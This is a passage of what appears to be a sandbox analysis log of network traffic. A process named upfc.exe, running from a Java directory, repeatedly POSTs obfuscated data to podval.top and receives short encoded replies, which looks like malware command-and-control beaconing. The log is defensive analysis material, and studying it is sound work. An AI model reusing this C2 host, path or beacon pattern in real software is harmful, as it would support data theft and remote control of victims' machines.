                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jyVcVDsTVizqlJBgbCGuRm6YumtghWOSgYeHlAoMkzYVvPEQGMfMPvwfPOhA6Xu0xGdrTgycaj%2BRlyNdqmM8xn0tJiIjNd12zFh6mszczqGlDS0XtHU6hWyjjD6U"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4780d4bc481-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.10 | 49743 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:30.381244898 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:30.728904009 CEST | 1060 | OUT | Data Raw: 5f 53 5a 58 5b 56 57 50 58 56 55 51 50 5d 59 53 55 5b 5e 54 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZX[VWPXVUQP]YSU[^TQTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&A0:73V?])X9T4=!.5]&5.$0+,.?[ 2 X,<"['$Y 5
                                                    Jul 3, 2024 16:42:30.838303089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:31.185659885 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeKrjeVUbRw0nt5bX2PQmWlysxupYCAcZLmEIo%2BDholkc49jlWWl7%2B5cotO5Px796XtqqMLZYLnA9HJ%2BCiEOfRI%2BIL5ablaSlMpg5ZpK5Lck1HBrkxPj43MHlrAm"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a47e7b0c7ce2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.10 | 49744 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:31.312539101 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:31.666497946 CEST | 1060 | OUT | Data Raw: 5a 56 5a 58 5e 58 52 5b 58 56 55 51 50 50 59 54 55 59 5e 5d 51 5e 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZVZX^XR[XVUQPPYTUY^]Q^SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z&/$)'#*:7&:!['"'U<--?7?,"['$Y
                                                    Jul 3, 2024 16:42:31.763647079 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:32.099236965 CEST | 576 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofPTLlGC75RyWUNhIWEAp1m1h0HZdyla1leiLQTC3qRyoa7UcC6ZtLCUw8nl1fSomFtQsqxL%2F2LuAlpi5Tl2VkZod8cMQs74EGluEMA1S906q2loeOlniRrlGumF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a48438fc421c-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.10 | 49745 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:32.235315084 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:32.588375092 CEST | 1060 | OUT | Data Raw: 5a 50 5f 5b 5b 5b 57 5f 58 56 55 51 50 5c 59 54 55 50 5e 5e 51 5e 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZP_[[[W_XVUQP\YTUP^^Q^SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\19$94$0<>>#-%:-X$&30?S-=<4,,"['$Y 1
                                                    Jul 3, 2024 16:42:32.717751026 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:33.061202049 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ickc%2BTP6T9wsVzhDkVSoiZTLKvsZogWrWnQ6RFQgpJmjmGCZxB%2FWXnduVajKWQkGbhz6vZpbJrHbUa0q2ynZxgvMB9lxe59rYb5CCkIKULip0p8xwRGmy7L1T9K4"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a48a282f72ad-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.10 | 49746 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:33.188224077 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:33.541723013 CEST | 1060 | OUT | Data Raw: 5f 55 5a 5f 5e 5f 52 5a 58 56 55 51 50 5f 59 52 55 5b 5e 5b 51 5a 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _UZ_^_RZXVUQP_YRU[^[QZS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z%:8D&)+$V$*U *9>9Y'%!0 3W/<4#-,"['$Y =
                                                    Jul 3, 2024 16:42:33.663880110 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:34.013711929 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FEbnBp0zdq42gfJU39p%2BerSZLhcHwXPo8U65bBmRaqtnRPqICHvDksLCPgw5A%2B6TQ3f4RqM3nLCKHROwv8pWjPWfq6uLWnGhuJSEwmZGOmHp%2Bye0hJPmN7zEg%2BUi"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a49018efc420-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.10 | 49747 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:34.141742945 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:34.494729042 CEST | 1060 | OUT | Data Raw: 5f 52 5f 5a 5b 5b 52 5c 58 56 55 51 50 5f 59 56 55 50 5e 5d 51 5c 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_Z[[R\XVUQP_YVUP^]Q\S^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&9A'*43'\>>.#>,>9Y'9Y$7;X7#","['$Y =
                                                    Jul 3, 2024 16:42:34.612957001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:34.947860956 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ha5LOKZVpzP0Rn8j71SpWzCsNPmgfiknj9%2FdxhYbsPhqG1SnzndEGsJiDYf8WpOqbCEueN8T812KwkDlUvZphd%2BwSH07Eld6dpaAkW9rYz%2BGrchtrmqElGwmoUhh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4960f654204-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.10 | 49748 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:34.987618923 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:35.340346098 CEST | 1772 | OUT | Data Raw: 5a 52 5f 5a 5b 5c 57 5d 58 56 55 51 50 5e 59 50 55 5b 5e 5a 51 54 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_Z[\W]XVUQP^YPU[^ZQTS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%98E3)]%0(-9U4-.=&%63//> ',<"['$Y
                                                    Jul 3, 2024 16:42:35.450520992 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:35.794322968 CEST | 793 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VJLg2G9JjnLF8HZdasj0tGt4lrthTI0bY87YHJ17Ke6li4eOOH1yRKrI6eEPz15aZD3n7HriLWTbjxnUXABlk3ocHhW%2FKXai2LRV8eRtiwqWuDBoj9J7BY69JO6"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a49b4d639e02-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 64 63 0d 0a 09 1a 26 05 27 39 31 5d 26 32 2f 16 39 2d 38 0e 2b 2d 3f 04 3b 00 26 07 2a 34 26 03 3a 00 32 55 23 3a 26 5c 2a 2f 24 15 25 09 2f 08 21 31 20 5b 04 1c 23 5d 3e 39 21 5f 29 28 2b 53 25 3c 26 1f 25 24 3a 05 33 3b 21 0f 27 28 06 05 3f 06 13 1e 30 0b 24 05 3d 16 2d 02 28 09 22 58 36 1e 21 54 02 13 22 55 27 03 3a 0e 20 1e 28 0c 31 1e 39 1b 33 27 33 53 33 1d 2d 0b 29 0d 04 56 24 1f 15 05 35 01 23 57 33 38 31 07 33 04 3a 04 21 02 23 5f 2b 00 07 5a 34 06 1d 39 38 29 11 5c 3c 38 11 2a 0f 29 54 29 3e 31 04 2e 30 58 08 5e 3c 31 20 0b 0e 39 57 30 3c 00 06 0b 3c 2c 1b 1b 3c 3a 19 32 24 06 57 39 3b 09 1e 21 02 07 2e 52 39 05 3e 23 00 5a 00 18 3a 1c 3d 00 0c 3f 57 5f 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: dc&'91]&2/9-8+-?;&*4&:2U#:&\*/$%/!1 [#]>9!_)(+S%<&%$:3;!'(?0$=-("X6!T"U': (193'3S3-)V$5#W3813:!#_+Z498)\<8*)T)>1.0X^<1 9W0<<,<:2$W9;!.R9>#Z:=?W_0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.10 | 49749 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:35.206255913 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:35.557178974 CEST | 1060 | OUT | Data Raw: 5f 5b 5a 5e 5b 5c 57 59 58 56 55 51 50 5b 59 5a 55 5c 5e 5d 51 5a 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[Z^[\WYXVUQP[YZU\^]QZSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%03:+'#[(=1U#>)[,.-'=Z$+;;Y7(8"['$Y -
                                                    Jul 3, 2024 16:42:35.665199041 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:36.016758919 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFq64FuDlWf5umKSrSnHZ1YJ9KFjQ3j39psp%2Fu5w4xZqEZZsK6mk5JEsa6bw4YU4jTcQ8FGu1OeXYwb2NdmmbviXbgkBNhRe0qVetWv7bWwnZFn4qSaJqSr7hNP%2F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a49c9f65c411-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
                                                    Jul 3, 2024 16:42:36.054222107 CEST | 269 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 500
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:36.151065111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:36.151331902 CEST | 500 | OUT | Data Raw: 5f 52 5f 54 5b 5d 57 50 58 56 55 51 50 51 59 5a 55 5c 5e 5b 51 5a 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_T[]WPXVUQPQYZU\^[QZSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&*;' '0$=.5T#.>:>$&&$U#;X'[488"['$Y


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.10 | 49750 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:36.174698114 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:36.525840044 CEST | 1060 | OUT | Data Raw: 5a 55 5a 58 5b 56 57 59 58 56 55 51 50 51 59 54 55 5c 5e 55 51 58 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZUZX[VWYXVUQPQYTU\^UQXS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]')/$)4%0;\)>-R!=5Y:-Y'%"0(-=;[ 23/"['$Y
                                                    Jul 3, 2024 16:42:36.624550104 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:36.974387884 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMFNwN7zq%2Fa%2FSqm5dJfc6hxAs4Eqhzro%2FrL0dsQUlLBna1UHCmInjz8PTaPtr9TaDrhl6G1ZVcvyZAfhCODKWB7x9Fh0gTpDmx3NJVRkpAnX0UhkpGkNWlrq98D3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4a29d1e8c8a-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
                                                    Jul 3, 2024 16:42:36.975984097 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:37.071537018 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:37.071774006 CEST | 1772 | OUT | Data Raw: 5a 56 5f 5a 5b 56 57 5e 58 56 55 51 50 5c 59 54 55 51 5e 55 51 58 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV_Z[VW^XVUQP\YTUQ^UQXSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!20_%0(-&7[*,>%Y'%%\03S/-'78Y;"['$Y 1
                                                    Jul 3, 2024 16:42:37.397105932 CEST | 733 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKl1efTz9xVD6czCPHcA12kw4eQ%2B0RzKw7Rj1m6HPX1mIEkm7KHLGSEUcEngqPhL24vr8obriI%2BpgPOWljzKS%2BzpquBpAI92WwPC%2FEHzijNlUWNyDqj155e%2BRXWM"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4a5699a8c8a-EWR
                                                    alt-svc: h2=":443"; ma=60


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.10 | 49751 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:36.194538116 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 2048
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:36.541493893 CEST | 2048 | OUT | Data Raw: 5a 57 5a 5f 5e 5f 57 51 58 56 55 51 50 59 59 5a 55 50 5e 59 51 55 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
